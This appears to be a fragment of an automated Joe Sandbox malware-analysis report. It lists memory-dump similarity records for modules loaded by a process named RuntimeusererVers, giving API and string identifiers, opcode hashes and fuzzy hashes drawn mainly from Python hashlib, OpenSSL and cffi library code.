                                                                                                                                                                                                                                          • API ID: Object_$Module_State$Arg_BufferDeallocDigestErr_Eval_P_get_digestbynameThread$Buffer_CheckD_flagsInit_exKeywordsMemoryParse_Py_hashtable_getReleaseRestoreSaveSizeStringTrueUnpackUpdateX_newX_set_flags
                                                                                                                                                                                                                                          • String ID: Buffer must be single dimension$Strings must be encoded before hashing$name must be a string$object supporting the buffer API required$unsupported hash type %s
                                                                                                                                                                                                                                          • API String ID: 3145466953-2464896590
                                                                                                                                                                                                                                          • Opcode ID: 830aff63cd84496b6819a5005a6a5239bfdf339bdfc9b909ef5e8fed9a1a609f
                                                                                                                                                                                                                                          • Instruction ID: 48887fda49adde7be7f867f31cc4fdba85cd8e4d992faffcecc8f1958a3857bd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 830aff63cd84496b6819a5005a6a5239bfdf339bdfc9b909ef5e8fed9a1a609f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DCC11961A49F4382EA64CB22A858AB963A0BF85BF4F444735DD4E477A4DF7CF4E48300

                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
• Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmp
• Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: R_put_error$L_sk_set_cmp_funcX509_$E_freeM_read_bio_O_freeX509X509_free$E_dupErrorL_sk_findL_sk_pushLastO_ctrlO_newO_s_fileO_snprintfR_add_error_dataR_clear_errorR_endR_readX509_get_subject_name_errno
                                                                                                                                                                                                                                          • String ID: %s/%s$..\s\ssl\ssl_cert.c$OPENSSL_DIR_read(&ctx, '
                                                                                                                                                                                                                                          • API String ID: 1034648778-4291904164
                                                                                                                                                                                                                                          • Opcode ID: 627fe3b24fabd2d2a33f12e6dd11bf5debad2629e1e43702dac1066637e908aa
                                                                                                                                                                                                                                          • Instruction ID: e1d35768ab0a8966b5c4ca2357042ccaee1fe53fb7d095f5381339aa8ed8bb55
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 627fe3b24fabd2d2a33f12e6dd11bf5debad2629e1e43702dac1066637e908aa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 65717561A1CE8686FE609F61E4117B96360FF857E4F440235EA4E17B96DF3CF8868B04

                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
• Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Unicode_$Err_Size$Arg_FormatParseTuple_$FreeLibraryLoadMem_$CharClearErrorFromLastStringWide
                                                                                                                                                                                                                                          • String ID: <None>$O|i:load_library$U|i:load_library$cannot call dlopen(NULL)$cannot load library '%s': %s$dlopen() takes a file name or 'void *' handle, not '%s'$dlopen(None) not supported on Windows$error 0x%x$et|i:load_library$|Oi:load_library
                                                                                                                                                                                                                                          • API String ID: 2215032769-880521189
                                                                                                                                                                                                                                          • Opcode ID: d33b9080e6081043660d333d8efc643bee4a4a70433360aad55e39fa3bf20ac8
                                                                                                                                                                                                                                          • Instruction ID: 76e6c8f9945fda89e7f392ca7a4de3ec130097bdc143c2455bf189866b78f1bf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d33b9080e6081043660d333d8efc643bee4a4a70433360aad55e39fa3bf20ac8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4191EF21A09F42D6EA08CF66EC605E863A1FB84BE4B844632E91E477A4DF7DF509C340

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
• Not Executed
APIs
Strings
Memory Dump Source
• Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
• Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
Similarity
• API ID: Module_Object_P_get_digestbynameState$BufferBuffer_Err_Eval_ReleaseStringThread$CheckD_flagsDeallocDigestInit_exPy_hashtable_getRestoreSaveX_newX_set_flags
• String ID: Buffer must be single dimension$Strings must be encoded before hashing$object supporting the buffer API required$unsupported hash type %s
• API String ID: 1905720158-26133693
• Opcode ID: 4c326127dbcfc7f4e76e7507b2dad3fd2dc672b2a1a0208813b5d74c27768c37
• Instruction ID: f8f228496b1bb25b0662ec050fea5b94f1908660ea5f7f3a87903dbd55b87541
• Opcode Fuzzy Hash: 4c326127dbcfc7f4e76e7507b2dad3fd2dc672b2a1a0208813b5d74c27768c37
• Instruction Fuzzy Hash: 10911E21E4CF4381EA659B21A858AB963A4BF89BF1F145335DD4E47B94DF6CF8E48300

Control-flow Graph

• Executed
• Not Executed
APIs
Strings
Memory Dump Source
• Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
• Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
Similarity
• API ID: Dealloc$Dict_$ItemSize$CallCapsule_Eval_Object_PackThreadTuple_$Arg_Function_Keywords_Method_ParsePointerRestoreSaveThread_acquire_lockThread_allocate_lockThread_free_lockThread_release_lockTuple
• String ID: cffi_init_once_lock$setdefault
• API String ID: 1006512166-1600032183
• Opcode ID: 798fb11d3c42691da869e6142c12ace403bc6e186e8ec3f989e4286329429938
• Instruction ID: 065c2b7518bc9af4c70ea69ed9b928147e884e3e5f2cec7a6c1ecc847aff32e2
• Opcode Fuzzy Hash: 798fb11d3c42691da869e6142c12ace403bc6e186e8ec3f989e4286329429938
• Instruction Fuzzy Hash: 3F711825A09F0281EA599F2AAD642B963A1AF49FF4F080235DE4E06764EF3DF585C740

Control-flow Graph

• Executed
• Not Executed
APIs
Strings
• extern "Python": function %s() called, but %s. Returning 0., xrefs: 00007FF81E519D6B
Memory Dump Source
• Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
• Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
Similarity
• API ID: State_$Value$Dealloc$DictErrorInterpreterLastReleaseThread_errnomalloc$ClearDict_Err_FromItemLong_Void__acrt_iob_funcfprintfmemset
• String ID: extern "Python": function %s() called, but %s. Returning 0.
• API String ID: 384508774-1240277920
• Opcode ID: 191972da915f526837c2da820d8dae616a5c72836fa919b7908825d891de8d14
• Instruction ID: a184bcd279bbb2f2e44352510abf8a1a9df050f3de4d94f1d77144a5a3d2c936
• Opcode Fuzzy Hash: 191972da915f526837c2da820d8dae616a5c72836fa919b7908825d891de8d14
• Instruction Fuzzy Hash: 3251DA35A09F4286EA599F21EC642B963B0FF48BE4F084639DA1E07755EF3DF9548340

Control-flow Graph

• Executed
• Not Executed
APIs
Strings
Memory Dump Source
• Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
• Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmp
• Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmp
• Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmp
• Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmp
• Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmp
• Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
Similarity
• API ID: Dealloc$Err_State_$ReleaseUnraisableWrite$ArgsCallFunctionObjectObject_$EncodedEnsureFromL_get_ex_dataL_get_servernameLongLong_OccurredUnicode_Weakref_
• String ID: ascii
• API String ID: 3188396730-3510295289
• Opcode ID: c5a90ee6353e318aa7875a3d54ac4386d04088e56dbf5d2ee6200097549e08cf
• Instruction ID: c8f253fdce24dbeb8ac48ed6e6eedd91628ec2cc30d24cd163f9ba1c40171e71
• Opcode Fuzzy Hash: c5a90ee6353e318aa7875a3d54ac4386d04088e56dbf5d2ee6200097549e08cf
• Instruction Fuzzy Hash: 41510425A09E5286FA149F22A91923D77A0BF89FF6F844630DE4E07B54DF3CF4968304

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
• Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Buffer_$Arg_BufferContiguousObject_Release$ArgumentErr_KeywordsLongLong_OccurredSizeUnicode_Unpack
                                                                                                                                                                                                                                          • String ID: argument 'hash_name'$argument 'password'$argument 'salt'$contiguous buffer$embedded null character$pbkdf2_hmac$str
                                                                                                                                                                                                                                          • API String ID: 448224016-2023054051
                                                                                                                                                                                                                                          • Opcode ID: 0315e8822ebb32e9b92e5fa0fd473f87c62cbae28dce2236d2c6d06a2981c936
                                                                                                                                                                                                                                          • Instruction ID: c40ff52c5c18a5d04305156fcf46b560ed5168c36680c25e112cb479de576c19
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0315e8822ebb32e9b92e5fa0fd473f87c62cbae28dce2236d2c6d06a2981c936
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EE811B22A08F8782EA60CB11E844BB963A1FB99BF4F445335DA5D47A95DF3CF5A4C700

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
• Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ReadyUnicode_$Arg_Bool_CheckFromLongPositional
                                                                                                                                                                                                                                          • String ID: Buffer must be single dimension$compare_digest$comparing strings with non-ASCII characters is not supported$unsupported operand types(s) or combination of types: '%.100s' and '%.100s'
                                                                                                                                                                                                                                          • API String ID: 960716163-2538118963
                                                                                                                                                                                                                                          • Opcode ID: fb16102ad7aedabbae2b720364eef6ebaee46cbfe74884b07019a587325ceb3c
                                                                                                                                                                                                                                          • Instruction ID: 7645c252669f71b215d1bfec7a5813b67cf9cb86b0a5e7eac217cf0db28b9ab2
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fb16102ad7aedabbae2b720364eef6ebaee46cbfe74884b07019a587325ceb3c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99618E65A08E4382EB64CB25E458A792361FF84BF4F144331DA5E476A4EF2CF4E5C740

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
• Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: State_Thread$StateThisValue$ClearDeallocDeleteDictDict_EnsureErrorEval_FatalFuncItemObject_RestoreStringThread_acquire_lockThread_release_lockUncheckedmalloc
                                                                                                                                                                                                                                          • String ID: cffi.thread.canary$cffi: invalid ThreadCanaryObj->tstate$thread_canary_free_zombies
                                                                                                                                                                                                                                          • API String ID: 1895661259-237290086
                                                                                                                                                                                                                                          • Opcode ID: f2e2fc1221ed4e2d4d115be6e6ae4b52d225a02831b9e2bcfc9014c7914a76ce
                                                                                                                                                                                                                                          • Instruction ID: f8009ff6d55231bec0820b64e0e4abc6c92b1a615e7fa59fc764e02da0e0032b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f2e2fc1221ed4e2d4d115be6e6ae4b52d225a02831b9e2bcfc9014c7914a76ce
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0451F136A19F02C2EA188B25ED641B873A0FF88BE1F580635DA4E47760EF7DF5958310
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • implicit cast to 'char *' from a different pointer type: will be forbidden in the future (check that the types are as you expect; use an explicit ffi.cast() if they are correct), xrefs: 00007FF81E5045A5
                                                                                                                                                                                                                                          • write_raw_integer_data: bad integer size, xrefs: 00007FF81E50473D
                                                                                                                                                                                                                                          • pointer or array, xrefs: 00007FF81E504602
                                                                                                                                                                                                                                          • pointer to same type, xrefs: 00007FF81E504619
                                                                                                                                                                                                                                          • write_raw_integer_data, xrefs: 00007FF81E504744
                                                                                                                                                                                                                                          • implicit cast from 'char *' to a different pointer type: will be forbidden in the future (check that the types are as you expect; use an explicit ffi.cast() if they are correct), xrefs: 00007FF81E5045AC
                                                                                                                                                                                                                                          • convert_from_object: '%s', xrefs: 00007FF81E504956
                                                                                                                                                                                                                                          • cdata pointer, xrefs: 00007FF81E504558
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
• Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmp
• Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: cdata pointer$convert_from_object: '%s'$implicit cast from 'char *' to a different pointer type: will be forbidden in the future (check that the types are as you expect; use an explicit ffi.cast() if they are correct)$implicit cast to 'char *' from a different pointer type: will be forbidden in the future (check that the types are as you expect; use an explicit ffi.cast() if they are correct)$pointer or array$pointer to same type$write_raw_integer_data$write_raw_integer_data: bad integer size
                                                                                                                                                                                                                                          • API String ID: 0-1884834070
                                                                                                                                                                                                                                          • Opcode ID: e7bdf1df732a0f7463d4ad8f6c75a7785ed1cc8f59bb040112b8e12e18ee6264
                                                                                                                                                                                                                                          • Instruction ID: cfd7ce9868353ecd762c3f2a8dc116cbe9648a2ae57daf9430309ff80f12656f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e7bdf1df732a0f7463d4ad8f6c75a7785ed1cc8f59bb040112b8e12e18ee6264
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F5D14331E09E53C6EA659B15EC701F92BA0AF95BF4F444B31EA4E466E1EF2CF8458300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: X_ctrl$X_free$D_sizeR_put_errorX_new_idY_derive_init
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\tls13_enc.c$U$W$tls13
                                                                                                                                                                                                                                          • API String ID: 2176224248-2595563013
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Arg_Err_ParseSizeStringTuple_
                                                                                                                                                                                                                                          • String ID: enumerators must be a list of strings$expected a primitive signed or unsigned base type$sO!O!O!:new_enum_type$tuple args must have the same size
                                                                                                                                                                                                                                          • API String ID: 4247878537-3833221460
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: SizeStringTuple_$Arg_DeallocDict_Err_FromItemParseUnicode_
                                                                                                                                                                                                                                          • String ID: O!s$addressof() expects at least 1 argument$cannot take the address of the constant '%.200s'$expected a cdata struct/union/array object$expected a cdata struct/union/array/pointer object
                                                                                                                                                                                                                                          • API String ID: 3853558574-3015567189
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_FormatObject_
                                                                                                                                                                                                                                          • String ID: cdata '%s' is opaque$convert_to_object: '%s'$got a _Bool of value %d, expected 0 or 1$read_raw_complex_data$read_raw_complex_data: bad complex size$read_raw_signed_data$read_raw_signed_data: bad integer size$read_raw_unsigned_data$read_raw_unsigned_data: bad integer size
                                                                                                                                                                                                                                          • API String ID: 2473357163-3506759392
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • It is a struct with bit fields, which libffi does not support, xrefs: 00007FF81E50A5B4
                                                                                                                                                                                                                                          • It is a struct declared with "...;", but the C calling convention may depend on the missing fields; or, it contains anonymous struct/unions, xrefs: 00007FF81E50A50C
                                                                                                                                                                                                                                          • ctype '%s' has incomplete type, xrefs: 00007FF81E50A4A2
                                                                                                                                                                                                                                          • It is a 'packed' structure, with a different layout than expected by libffi, xrefs: 00007FF81E50A51E
                                                                                                                                                                                                                                          • ctype '%s' not supported as %s by libffi. Unions are only supported as %s if the function is 'API mode' and non-variadic (i.e. declared inside ffibuilder.cdef()+ffibuilder.set_source() and not taking a final '...' argument), xrefs: 00007FF81E50A6D7
                                                                                                                                                                                                                                          • argument, xrefs: 00007FF81E50A437
                                                                                                                                                                                                                                          • ctype '%s' not supported as %s. %s. Such structs are only supported as %s if the function is 'API mode' and non-variadic (i.e. declared inside ffibuilder.cdef()+ffibuilder.set_source() and not taking a final '...' argument), xrefs: 00007FF81E50A5CB
                                                                                                                                                                                                                                          • (the support for complex types inside libffi is mostly missing at this point, so CFFI only supports complex types as arguments or return value in API-mode functions), xrefs: 00007FF81E50A705
                                                                                                                                                                                                                                          • ctype '%s' (size %zd) not supported as %s%s, xrefs: 00007FF81E50A710
                                                                                                                                                                                                                                          • It is a struct with a zero-length array, which libffi does not support, xrefs: 00007FF81E50A5AB
                                                                                                                                                                                                                                          • return value, xrefs: 00007FF81E50A430
                                                                                                                                                                                                                                          • ctype '%s' has size 0, xrefs: 00007FF81E50A4A9
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (the support for complex types inside libffi is mostly missing at this point, so CFFI only supports complex types as arguments or return value in API-mode functions)$It is a 'packed' structure, with a different layout than expected by libffi$It is a struct declared with "...;", but the C calling convention may depend on the missing fields; or, it contains anonymous struct/unions$It is a struct with a zero-length array, which libffi does not support$It is a struct with bit fields, which libffi does not support$argument$ctype '%s' (size %zd) not supported as %s%s$ctype '%s' has incomplete type$ctype '%s' has size 0$ctype '%s' not supported as %s by libffi. Unions are only supported as %s if the function is 'API mode' and non-variadic (i.e. declared inside ffibuilder.cdef()+ffibuilder.set_source() and not taking a final '...' argument)$ctype '%s' not supported as %s. %s. Such structs are only supported as %s if the function is 'API mode' and non-variadic (i.e. declared inside ffibuilder.cdef()+ffibuilder.set_source() and not taking a final '...' argument)$return value
                                                                                                                                                                                                                                          • API String ID: 0-3203576518
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
• Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmp
• Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmp
• Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmp
• Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmp
• Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmp
• Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Eval_FetchState_Thread_errno$EnsureErrnoFilenameFromL_get_ex_dataO_ctrlO_printfObjectReleaseRestoreSaveStringThread_acquire_lockThread_allocate_lockThread_release_lockWith
                                                                                                                                                                                                                                          • String ID: %s$Unable to allocate lock
                                                                                                                                                                                                                                          • API String ID: 2873158514-852672932
                                                                                                                                                                                                                                          • Opcode ID: f91797b022f00b35e9185e579c68ffe8f00f61b90fd895f074716c2cc15eadb7
                                                                                                                                                                                                                                          • Instruction ID: 55e49791c69b502f190b77af661f450f75c48f099c1892ebd12a0c99a467b5b5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f91797b022f00b35e9185e579c68ffe8f00f61b90fd895f074716c2cc15eadb7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8A41C875A08E4682FB509B65E8542697761FB89BF6F814231CA4F43B64DF7CF499C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
• Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmp
• Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmp
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Buffer_Release$BufferDigestErr_Eval_Object_StringThreadUpdate$CheckRestoreSaveThread_acquire_lockThread_allocate_lockThread_release_lock
                                                                                                                                                                                                                                          • String ID: Buffer must be single dimension$Strings must be encoded before hashing$object supporting the buffer API required
                                                                                                                                                                                                                                          • API String ID: 3566613315-2943709887
                                                                                                                                                                                                                                          • Opcode ID: a1547ea42d92a3772ce6650c4cebde31e608418f5351fa5d4bab7438ae3a001c
                                                                                                                                                                                                                                          • Instruction ID: a412af48bc50678f6e2c10b5b371d8db98b858022241a1afc604087ffc944732
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1547ea42d92a3772ce6650c4cebde31e608418f5351fa5d4bab7438ae3a001c
